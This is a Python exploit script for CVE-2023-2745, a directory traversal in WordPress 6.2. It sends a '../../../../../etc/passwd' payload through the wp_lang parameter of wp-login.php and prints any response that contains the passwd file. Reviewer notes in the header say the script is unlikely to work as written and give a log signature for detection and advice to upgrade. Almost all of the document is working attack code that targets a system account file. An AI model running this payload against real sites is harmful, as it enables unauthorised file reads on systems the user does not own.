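# Exploit Title: WordPress Core 6.2 - Directory Traversal
# Date: 2025-04-16
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Version: = 6.2
# Tested on: Win, Ubuntu
# CVE : CVE-2023-2745
#
# Reviewer notes:
# - What the script does: one GET to the supplied URL with `wp_lang` set to
#   a relative path, then a search of the response body for the first line
#   of a typical /etc/passwd.
# - Reliability: CVE-2023-2745 is described as a traversal in `wp_lang` that
#   lets translation files be loaded; it is not described as a generic
#   file-read. The /etc/passwd marker is therefore unlikely to appear even
#   on an affected install, and the "expected file was not found" branch
#   must not be read as "patched". Confirm exposure from the installed
#   WordPress version instead.
# - Detection: requests to wp-login.php whose `wp_lang` value contains `../`
#   are a useful signal in web-server and WAF logs.
# - Mitigation: run a WordPress release newer than the affected version
#   listed above.
import sys

import requests
from colorama import init, Fore, Style

init(autoreset=True)

# Without a timeout, requests.get() can block indefinitely on a silent host.
REQUEST_TIMEOUT = 10  # seconds

url = input("E.G https://example.com/wp-login.php : ").strip()
payload = '../../../../../etc/passwd'

try:
    response = requests.get(
        url,
        params={'wp_lang': payload},
        timeout=REQUEST_TIMEOUT,
    )
except requests.RequestException as exc:
    # Covers a missing or invalid scheme, DNS failure, refused connection,
    # TLS errors and timeouts, which previously ended in a traceback.
    print(Fore.RED + f'Request failed: {exc}')
    sys.exit(1)

# requests follows redirects by default, so the status code checked below is
# the one from the final hop; report that hop so the result is attributed to
# the host that actually answered.
if response.history:
    print(Fore.YELLOW + f'Followed {len(response.history)} redirect(s); final URL: {response.url}')

if response.status_code == 200:
    if "root:x:0:0:root" in response.text:
        print(Fore.GREEN + 'Exploit successful, accessed content:')
        print(Fore.GREEN + response.text)
    else:
        # A normal login page also lands here; see the reliability note in
        # the header before drawing a conclusion from this branch.
        print(Fore.YELLOW + 'Accessed content, but the expected file was not found:')
        print(Fore.YELLOW + response.text)
elif response.status_code in {400, 401, 403, 404}:
    print(Fore.RED + f'Client error, status code: {response.status_code}')
elif response.status_code // 100 == 5:
    print(Fore.RED + f'Server error, status code: {response.status_code}')
elif response.status_code // 100 == 3:
    # Only reached when a 3xx response could not be followed (for example,
    # one without a Location header).
    print(Fore.YELLOW + f'Redirection, status code: {response.status_code}')
else:
    print(f'Status code: {response.status_code}')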